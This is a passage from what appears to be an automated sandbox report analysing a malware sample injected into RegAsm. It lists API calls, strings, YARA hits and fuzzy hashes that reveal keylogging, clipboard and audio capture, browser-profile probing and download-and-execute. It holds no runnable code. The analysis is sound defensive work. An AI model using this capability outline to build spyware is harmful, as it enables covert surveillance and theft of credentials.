                                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MetricsSystem
                                          • String ID:
                                          • API String ID: 4116985748-0
                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                          APIs
                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                          • String ID:
                                          • API String ID: 1761009282-0
                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                          APIs
                                          • _free.LIBCMT ref: 1000655C
                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: *?$.
                                          • API String ID: 2667617558-3972193922
                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                          • API String ID: 1881088180-3686566968
                                          • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                          • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                          APIs
                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 481472006-1507639952
                                          • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                          • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                          • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                          • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                          APIs
                                          • Sleep.KERNEL32 ref: 0041667B
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadFileSleep
                                          • String ID: !D@
                                          • API String ID: 1931167962-604454484
                                          • Opcode ID: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                                          • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                          • Opcode Fuzzy Hash: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                                          • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: : $Se.
                                          • API String ID: 4218353326-4089948878
                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                          APIs
                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: | $%02i:%02i:%02i:%03i
                                          • API String ID: 481472006-2430845779
                                          • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                          • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: alarm.wav$hYG
                                          • API String ID: 1174141254-2782910960
                                          • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                          • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                          • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                          • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped
                                          • API String ID: 1623830855-1496645233
                                          • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                          • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341
                                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                          APIs
                                          • waveInPrepareHeader.WINMM(006D9000,00000020,?), ref: 00401849
                                          • waveInAddBuffer.WINMM(006D9000,00000020), ref: 0040185F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferHeaderPrepare
                                          • String ID: XMG
                                          • API String ID: 2315374483-813777761
                                          • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                          • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: IsValidLocaleName$kKD
                                          • API String ID: 1901932003-3269126172
                                          • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                          • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                          • API String ID: 1174141254-4188645398
                                          • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                          • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                          • API String ID: 1174141254-2800177040
                                          • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                          • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: AppData$\Opera Software\Opera Stable\
                                          • API String ID: 1174141254-1629609700
                                          • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                          • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: X8p
                                          • API String ID: 269201875-3665062877
                                          • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                          • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                          APIs
                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                          • String ID: [AltL]$[AltR]
                                          • API String ID: 2738857842-2658077756
                                          • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                          • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: !D@$open
                                          • API String ID: 587946157-1586967515
                                          • Opcode ID: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                          • Opcode Fuzzy Hash: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                          APIs
                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State
                                          • String ID: [CtrlL]$[CtrlR]
                                          • API String ID: 1649606143-2446555240
                                          • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                          • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: ,kG$0kG
                                          • API String ID: 1881088180-2015055088
                                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
